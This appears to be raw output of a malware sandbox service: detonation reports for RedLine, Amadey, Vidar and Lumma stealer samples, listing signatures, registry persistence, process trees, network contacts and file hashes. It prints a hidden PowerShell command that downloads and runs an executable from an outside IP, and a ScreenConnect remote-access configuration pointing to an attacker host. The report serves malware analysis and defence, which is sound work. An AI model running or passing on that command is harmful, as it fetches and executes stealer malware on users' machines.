"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'J4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
"C:\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE"
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\9T4YEFyEF.hta
| MD5 | f0c99a072b3a41e0b07a63772514614a |
| SHA1 | 4149662f98408f25a9726b53bdd16325449f6316 |
| SHA256 | e7cf79e512a9b32c95a626735b09937a6456c1550f0ad39498487543c91116dd |
| SHA512 | 6b0efa113e09f10db718b7f3570920e551bb2c7442e239c00ebf29e601a4abe89ead41860467d823a0b0d0c998c8aacfc6e3a8af994a98d6c0375d77d05128c3 |
\Users\Admin\AppData\Local\TempJ4KUQPVMCNBOPWMONJ1R2CJSPSVLQKAI.EXE
| MD5 | 03a574d64f0e62c5e117a5f5acf137e4 |
| SHA1 | 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90 |
| SHA256 | dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747 |
| SHA512 | d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1 |
memory/2804-8-0x0000000006580000-0x00000000069D2000-memory.dmp
memory/2804-13-0x0000000006580000-0x00000000069D2000-memory.dmp
memory/1608-15-0x0000000000B10000-0x0000000000F62000-memory.dmp
memory/1608-16-0x0000000000B10000-0x0000000000F62000-memory.dmp
memory/1608-17-0x0000000000B10000-0x0000000000F62000-memory.dmp
memory/1608-20-0x0000000000B10000-0x0000000000F62000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\xqWgymz.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| GB | 45.155.103.183:1488 | | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
Files
memory/428-0-0x0000016B0DF00000-0x0000016B0E000000-memory.dmp
memory/428-1-0x00007FFD4D593000-0x00007FFD4D595000-memory.dmp
memory/428-2-0x0000016B0F920000-0x0000016B0F972000-memory.dmp
memory/428-3-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
memory/428-4-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
memory/428-5-0x00007FF680700000-0x00007FF6808AE000-memory.dmp
memory/428-6-0x0000016B290D0000-0x0000016B291DA000-memory.dmp
memory/428-7-0x0000016B281C0000-0x0000016B281D2000-memory.dmp
memory/428-8-0x0000016B28EE0000-0x0000016B28F1C000-memory.dmp
memory/428-9-0x0000016B28F70000-0x0000016B28FC0000-memory.dmp
memory/428-10-0x0000016B0DF00000-0x0000016B0E000000-memory.dmp
memory/428-11-0x0000016B294D0000-0x0000016B29692000-memory.dmp
memory/428-12-0x0000016B2A4E0000-0x0000016B2AA08000-memory.dmp
memory/428-13-0x00007FFD4D593000-0x00007FFD4D595000-memory.dmp
memory/428-14-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
memory/428-15-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
memory/428-17-0x00007FFD4D590000-0x00007FFD4E051000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Reads user/profile data of local email clients
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1980 set thread context of 2956 | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1980 -s 508
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | privileggoe.live | udp |
| US | 8.8.8.8:53 | foresctwhispers.top | udp |
| US | 104.21.48.1:443 | foresctwhispers.top | tcp |
| US | 8.8.8.8:53 | tracnquilforest.life | udp |
| US | 104.21.74.230:443 | tracnquilforest.life | tcp |
| US | 8.8.8.8:53 | presentymusse.world | udp |
| US | 8.8.8.8:53 | deaddereaste.today | udp |
| US | 8.8.8.8:53 | subawhipnator.life | udp |
| US | 8.8.8.8:53 | boltetuurked.digital | udp |
| US | 8.8.8.8:53 | pastedeputten.life | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | disobilittyhell.live | udp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
| US | 104.21.81.29:443 | disobilittyhell.live | tcp |
Files
memory/1980-0-0x0000000074BEE000-0x0000000074BEF000-memory.dmp
memory/1980-1-0x0000000000890000-0x00000000008F8000-memory.dmp
memory/2956-3-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-14-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-5-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-12-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-10-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2956-9-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-8-0x0000000000400000-0x000000000045E000-memory.dmp
memory/2956-7-0x0000000000400000-0x000000000045E000-memory.dmp
memory/1980-15-0x0000000074BE0000-0x00000000752CE000-memory.dmp
memory/2956-16-0x0000000000400000-0x000000000045E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarF35B.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
memory/2956-54-0x0000000000400000-0x000000000045E000-memory.dmp
memory/1980-55-0x0000000074BE0000-0x00000000752CE000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lumma Stealer, LummaC
Lumma family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (3be09d9e5e840c20)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=bbcnas2.zapto.org&p=8041&s=e228137a-1681-43c0-a833-6e8e39d6fe60&k=BgIAAACkAABSU0ExAAgAAAEAAQBdpn0O4B1VqMLUD0QDsNyYTlq4tRTm9ACUnnSMesFZALDh%2bLgBUwyTJ9D684SXejMRZmxv0Ws0vI2HDF%2f3pgx%2bIGwSyAZ%2fcl0w71rKbKyIIKYDZKbnkGgXvWGAi3ZyQp5OOPPQACb3KOn3dbHGC7zVR4YxQG18q4ph%2fyqoczab4g1p0ctN9m9IinVuQ4spX2nQNInOfCqxjvWdinItao7pk9fPOEV6qP3zSVfOwlnLHbRaASXeN%2fudvdB8e5o68h%2bjKG6VwXtszNJDCo7VtQqZmoYLmAVq9dmcJjckjVt0p%2bJPysj6usBrEV3AzT%2ff7W%2bYHYQ0svZBekSGOWFY8kLf&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAA6tAbC%2fd6IUm5KlyUsecM8wAAAAACAAAAAAAQZgAAAAEAACAAAAD%2bFWnEtXsXf6dv9%2biWS2mb246%2bRvHSvQbUp%2fSFTn0blwAAAAAOgAAAAAIAACAAAADkHLI487uefiU0MIAGiHY4HdRUacWhhdqcpeKLK0S3MqAEAABTEdQ2nm9aw8mWDMrlRhLj9YAw1IOICtN3qYONlpSq6J2mNV55%2fAvzADXO6S4Tmr1q7lF97Rkz%2blaDcqTVA2IHcz5jej3UKDxfYkSEDDirtySp9%2fGe5b1siLBj2pbmkYUMHgvq4IZL%2fLMry%2bGfMf0weSEE%2foBLPuIyIh3ZfQ8SgmNp2Hp2C%2ffhEu3QZfVrjyou9YL8do7jKatydjn9ZiodaC5Pvw3PJAvy%2bOX9KDg8ZgB4wMoqqchqCYNx%2f3yxCQDHCGz1hygzuMOBCSyONUWzeOxjjddpmU3dY08dNa4V9TAAwmVk0J2G2Kg%2fdwxjPnKn%2bIkPIpyNFwcrpzvpo3QAVMy9YzUc4R8Vrkn233x9WWV%2bf0nkucOpj3msl5UMJGrVqb5EMilczPC7D7hS9ynjUeKBi8OnWui2oyY5qiK4oyZcM4v6hGkbj1k4Ie92xpZzBvrj9Fquu%2fmlQbYockpoDyh%2f3st%2f5XOc5NjgEtmzs7zHDw8FrqRV5c8X2JLKwoPH3sg5TdQIZjz%2f5ehl0tHCeeLCQeu4LBnWbtOJ1IGnE1ccKPj%2bWzsP5CKwaHGHtFbRJg3OrHCHnKULTVV2hPgfZThG0lqE199iHP12Cqj9LQdhwMkFwWipvu29MMaZYLf0OxT3rwlBhlbvLA7nqPJXlfLvweIMsViX%2bUJolLM4xs0zu%2fnRyfkNFIdJ9nTztmcaQFLlzuYxkqepiIgOXmkt%2fXfndfcjtzaKo7wNI%2feJaY5eTRBn9BYsNwjvOIf4jWtjpw5NN18ac0hvCQSqeeg6m96SSKysJTp4tUryCokLHbvcxAj%2fZehgcJk7FOiyKAbDci5CXLNGpd70YQkMUW47JvCKJmt78WilpCvrhdR%2b9atel4zuErQf70pXopHA8N7r020%2fz0AUQBo89lQNQr9%2bhminXWES%2fCcxqhJxGvTR%2btzfntNVEM90aK9JTt1AyDB124P9ugoJQGl58pQov%2fgPmt1gOQ25Ck%2f5rZfrJhfZSwOKXkNYwAEuxTUNvz3AtlNBP97jiOuZhAij5Zc7y4kaXsDKSN8Zw9ZwIcQTQXHrfMEaYcwDRIugNjE0wAYsRr5omnCnUaOg819cEydPBl1LKbmRPk6wwdZRs7dZWlO9ST%2bBU3q9cjLiQEQ8rCLoxrlIRtwyCJCoK8S5eUHJwTL1WaJ9N4Ol0JCnW0aIKehufneBFgiIl7yzX%2bqvx68Ao8xnthe26AzpTf3tGqndfnEvIQcwpPALNKFxZCwKPNadpeaR%2fd3VIBYxBa19k%2bxQMLmfn3XaFNOCwfyavO8%2fuP6jk3Ly7s1BcpOjHCof%2fjtSY3VdyJAOlu2XLO6%2bm9Y%2f%2fmmmiTiWUFvZzF9H6alw8AAgZZ8UO7i9rpnVRM8dwzdB0gM7fnGAlkYAqreO09MpdV5FV93DQ5Z13L7Aa9gmmaFPLlaPJWLS8hcQhXiT4bo1oDhBK9qtJNZFM2%2btVjKJhsfG7wuhg6xIofz%2bWvEqRlmYtwzyUt7ZwpiyE5uI%2fASFFBAtD%2fLB5yLcoCQlm1sNXw9alfJOuh6w11zgms461sFVnVoznWiRUtauS%2fmOEG1E1UAAAADtl9q1L%2bRsXIKHuIQg6uVeVTXG624tqRh%2bY3o4d9DQ53iQnwPN6J6dszobqy5sF92DoON2Eg1nn3ORH%2fo8Fa0t&c=test&c=&c=&c=&c=&c=&c=&c=\"" | C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000650101\Y9WG5Ep.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | N/A | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | N/A | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000540101\bgUvqLl.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\b92cc19684.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035810101\\b92cc19684.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10035820121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
